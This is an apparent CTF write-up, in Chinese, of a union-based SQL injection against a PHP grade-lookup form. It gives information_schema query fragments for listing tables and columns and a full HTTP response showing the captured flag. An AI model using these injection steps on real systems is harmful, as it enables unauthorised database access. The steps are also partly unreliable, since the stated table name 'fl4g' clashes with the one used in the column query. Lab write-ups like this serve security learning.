这里是一个post请求,必定连接数据库,可以尝试sql注入
抓包,测试开始
首先注入点确定,这里有4个注入点
开始联合查询
联合查询注入得到当前权限账号、库名、MySQL版本号
接下来就是表名查询
TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1
得到表名为fl4g
在后取字段名
COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='skctf_flag' limit 0,1
得到字段skctf_flag
开始查询
HTTP/1.1 200 OK
Date: Fri, 29 Mar 2024 17:36:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1236
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>学生成绩查询</title>
<meta charset="utf-8">
<style type='text/css' >
table {
border-collapse: collapse;
font-family: Futura, Arial, sans-serif;
margin:0 auto;
width: 1000px;
}
caption {
font-size: 24px;
margin: 1em auto;
}
th,td {
padding: .65em;
}
th {
background: #9E9E9E;
border: 1px solid #777;
color: #000;
}
td {
border: 1px solid#777;
}
form {
text-align:center;
}
</style>
</head>
<body>
<h2 style='text-align:center;'>成绩查询</h2>
<form action='index.php' method='post'>
<input style='width:300px;height:40px;font-size:18px;' type='text' name='id' placeholder='1,2,3...'/><br><br><br><br><br>
<input style='width:100px;height:40px;' type='submit' value='Submit'/>
</form>
<table>
<caption>flag{a34b11efc2550275f84b3374aa4b34c8}的成绩单</caption>
<thead>
<tr>
<th>Math
<th>English
<th>Chinese
</thead>
<tbody>
<tr>
<td>1<td>1<td>1</tbody>
</table></body>
</html>
得到flag